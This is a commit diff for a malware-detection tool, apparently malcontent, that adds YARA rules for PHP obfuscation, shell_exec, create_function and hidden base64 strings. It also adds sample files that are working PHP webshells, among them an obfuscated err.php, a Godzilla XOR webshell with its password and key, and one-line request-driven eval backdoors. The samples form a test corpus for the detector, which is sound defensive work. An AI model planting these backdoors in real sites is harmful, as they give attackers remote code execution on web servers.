Improve PHP malware detection (add php-malware-finder) (chainguard-de…

…v#247)

* Improve PHP malware detection (add php-malware-finder)

* Improve detection of err.php webshell

pkg/compile/compile.go

@@ -49,7 +49,10 @@ var badRules = map[string]bool{
 var rulesWithWarnings = map[string]bool{
 	"opaque_binary":                         true,
 	"hardcoded_ip":                          true,
+	"str_replace_obfuscation":               true,
+	"php_str_replace_obfuscation":           true,
 	"hardcoded_ip_port":                     true,
+	"base64_str_replace":                    true,
 	"systemd_no_comments_or_documentation":  true,
 	"sleep_and_background":                  true,
 	"Microsoft_Excel_with_Macrosheet":       true,

pkg/report/report.go

@@ -152,6 +152,10 @@ func behaviorRisk(ns string, rule string, tags []string) int {
 		}
 	}
 
+	if strings.Contains(ns, "php-malware-finder") {
+		risk = 3
+	}
+
 	if strings.Contains(ns, "keyword") || strings.Contains(rule, "keyword") {
 		risk = 2
 	}

rules/combo/backdoor/php.yara

@@ -248,3 +248,23 @@ rule php_base64_encoded : critical {
   condition:
     any of them
 }
+
+rule php_str_replace_obfuscation : critical {
+	meta:
+		description = "accepts input and runs obfuscated code"
+	strings:
+		$f_str_replace = "str_replace"
+		$f_display_errors = "display_errors"
+		$f_output_buffering = "output_buffering"
+
+		$i_get = "$_GET["
+		$i_post = "$_POST["
+		$i_cookie = "$_COOKIE["
+
+		$o_dynamic_single = /\$\w {0,2}= \$\w\(/
+		$o_single_concat = /\$\w . \$\w . \$\w ./
+		$o_single_set = /\$\w = \w\(\)\;/
+		$o_recursive_single = /\$\w\( {0,2}\$\w\(/
+	condition:
+		filesize < 65535 and 2 of ($f*) and any of ($i*) and 2 of ($o*)
+}

rules/evasion/base64-decode.yara

@@ -12,6 +12,17 @@ rule base64_decode : medium python {
     any of them
 }
 
+
+rule py_base64_decode : medium php {
+  meta:
+    description = "decode base64 strings"
+  strings:
+    $b64decode = "base64_decode"
+  condition:
+    any of them
+}
+
+
 rule urlsafe_decode64 : medium ruby {
   meta:
     description = "decode base64 strings"

rules/evasion/base64-hidden.yara

@@ -0,0 +1,10 @@
+rule base64_str_replace : critical {
+	meta:
+	   description = "creatively hidden forms of the term 'base64'"
+	strings:
+		$a = /\wba\ws\we64/
+		$b = /\wb\wa\ws\we\w6\w4/
+		$c = /\wb\wa\wse\w6\w4/
+	condition:
+		any of them
+}

rules/evasion/php_no_time_limit.yara

@@ -0,0 +1,8 @@
+rule php_no_time_limit : medium {
+  meta:
+    description = "disables execution time limit"
+  strings:
+    $ref = "set_time_limit(0)"
+  condition:
+	$ref
+}

rules/evasion/script-obfuscation.yara

@@ -54,3 +54,16 @@ rule powershell_encoded : high windows {
   condition:
     filesize < 16777216 and any of them
 }
+
+rule str_replace_obfuscation : high {
+	meta:
+		description = "calls str_replace and uses obfuscated functions"
+	strings:
+		$str_replace = "str_replace"
+		$o_dynamic_single = /\$\w {0,2}= \$\w\(/
+		$o_single_concat = /\$\w . \$\w . \$\w ./
+		$o_single_set = /\$\w = \w\(\)\;/
+		$o_recursive_single = /\$\w\( {0,2}\$\w\(/
+	condition:
+		filesize < 65535 and $str_replace and 2 of ($o*)
+}

rules/exec/shell_command.yara

@@ -1,4 +1,3 @@
-
 rule system : medium {
   meta:
     description = "execute a shell command"
@@ -12,3 +11,13 @@ rule system : medium {
   condition:
     all of them in (1200..3000)
 }
+
+rule php_shell_exec : high {
+  meta:
+    description = "execute a shell command"
+    syscalls = "fork,execl"
+  strings:
+    $ref = /shell_exec[\(\$\w\)]{0,16}/
+  condition:
+	$ref
+}

rules/techniques/code_eval.yara

@@ -37,3 +37,13 @@ rule shell_eval : medium {
   condition:
     $val and none of ($not*)
 }
+
+rule php_create_function_no_args : high {
+  meta:
+    description = "dynamically creates PHP functions without arguments"
+  strings:
+	$val = /create_function\([\'\"]{2},\$/
+  condition:
+	any of them
+}
+

samples/PHP/2019.StackOverflow/README

@@ -0,0 +1 @@
+https://stackoverflow.com/questions/57783589/is-that-some-kind-of-php-backdoor

samples/PHP/2019.StackOverflow/smileyface.php

@@ -0,0 +1,3 @@
+<? $_="{";
+ $_=($_^"<").($_^">").($_^"/");?>
+ <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

samples/PHP/2024.Inull-Studio/err.php

@@ -0,0 +1,25 @@
+<?php
+@ini_set('output_buffering',0);@ini_set('display_errors', 0);@ini_set('output_buffering',0);@ini_set('display_errors', 0);
+try{
+function m(){
+$a = "sfdtfdrf";
+$b = "d_fdrfdefdpf";
+return str_replace("fd", "", $a.$b."dlfdafdcfde");
+}
+$c = time();
+$d = $c;
+if($c/$d-1===1 || !isset($_GET['c'])){
+	echo 'Error in page';
+}else{
+	throw new Exception($err, 114);
+}
+}catch(Exception $e){
+$f = "fU0leVSVkVS";
+$g = "IEBldmFsKCR";
+$h = "WydIVFRQX0F";
+$i = "DQ0VleQVCddKTs=";
+$j = m();
+$k  = $j("z", "", "zbazsze64"."_zdzeczodze");
+$l = $j("p", "", "pcprpepaptpe_fp"."upnpcptpipopn");
+$z = $l('', $k( $j( "le", "", $g . $f . $h . $i)));
+for($i=1;$i<=2;$i=$i+2){$z();}}

samples/PHP/2024.Inull-Studio/err.php.simple

@@ -0,0 +1,4 @@
+# PHP/2024.Inull-Studio/err.php
+combo/backdoor/php
+evasion/base64/hidden
+evasion/script/obfuscation

samples/PHP/2024.Inull-Studio/godzilla_xor_base64.php

@@ -0,0 +1,51 @@
+<?php
+@session_start();
+@set_time_limit(0);
+@error_reporting(0);
+function ee($D,$K){
+    for($i=0;$i<strlen($D);$i++) {
+        $c = $K[$i+1&15];
+        $D[$i] = $D[$i]^$c;
+    }
+    return $D;
+}
+function r(){
+$a = "sfdtfdrf";
+$b = "d_fdrfdefdpf";
+return str_replace("fd", "", $a.$b."dlfdafdcfde");
+}
+$pass='password114';
+$payloadName='payload';
+$key='32150285b345c48a';
+//$key='1145141919810'
+try{
+$c = time();
+$d = $c;
+if($c/$d-1===1 || !isset($_POST[$pass])){
+	echo 'Error in page';
+}else{
+	throw new Exception($err, 114);
+}
+}catch(Exception $e){
+if (isset($_POST[$pass])){
+    $data=ee(base64_decode($_POST[$pass]),$key);
+    if (isset($_SESSION[$payloadName])){
+        $payload=ee($_SESSION[$payloadName],$key);
+        if (strpos($payload,"getBasicsInfo")===false){
+            $payload=ee($payload,$key);
+        }
+        $re = r();
+        $k  = $re("z", "", "zbazsze64"."_zdzeczodze");
+        $l = $re("p", "", "pcprpepaptpe_fp"."upnpcptpipopn");
+        $f = $l('$payload', $k('ZXZhbCgkcGF5bG9hZCk7'));
+        $f($payload);
+        echo substr(md5($pass.$key),0,16);
+        echo base64_encode(ee(@run($data),$key));
+        echo substr(md5($pass.$key),16);
+    }else{
+        if (strpos($data,"getBasicsInfo")!==false){
+            $_SESSION[$payloadName]=ee($data,$key);
+        }
+    }
+}
+}

samples/PHP/2024.S3RV4N7-SHELL/crot.php.simple

@@ -0,0 +1,10 @@
+# PHP/2024.S3RV4N7-SHELL/crot.php
+3P/php-malware/nonprintablechars
+3P/php-malware/obfuscatedphp
+3P/php-malware/websites
+3P/signature_base/webshell/php
+combo/backdoor/php
+encoding/base64
+evasion/base64/decode
+ref/site/url
+techniques/code_eval

samples/PHP/2024.malcure/simple.php

@@ -0,0 +1,3 @@
+<!-- from https://malcure.com/blog/security/php-backdoor-101/ -->
+<?php
+if(!empty($_REQUEST['fcb'])){$fcb=base64_decode($_REQUEST['fcb']);$fcb=create_function('',$fcb);@$fcb();exit;}

samples/PHP/2024.malcure/simple.php.simple

@@ -0,0 +1,6 @@
+# PHP/2024.malcure/simple.php
+3P/signature_base/webshell/php
+encoding/base64
+evasion/base64/decode
+ref/site/url
+techniques/code_eval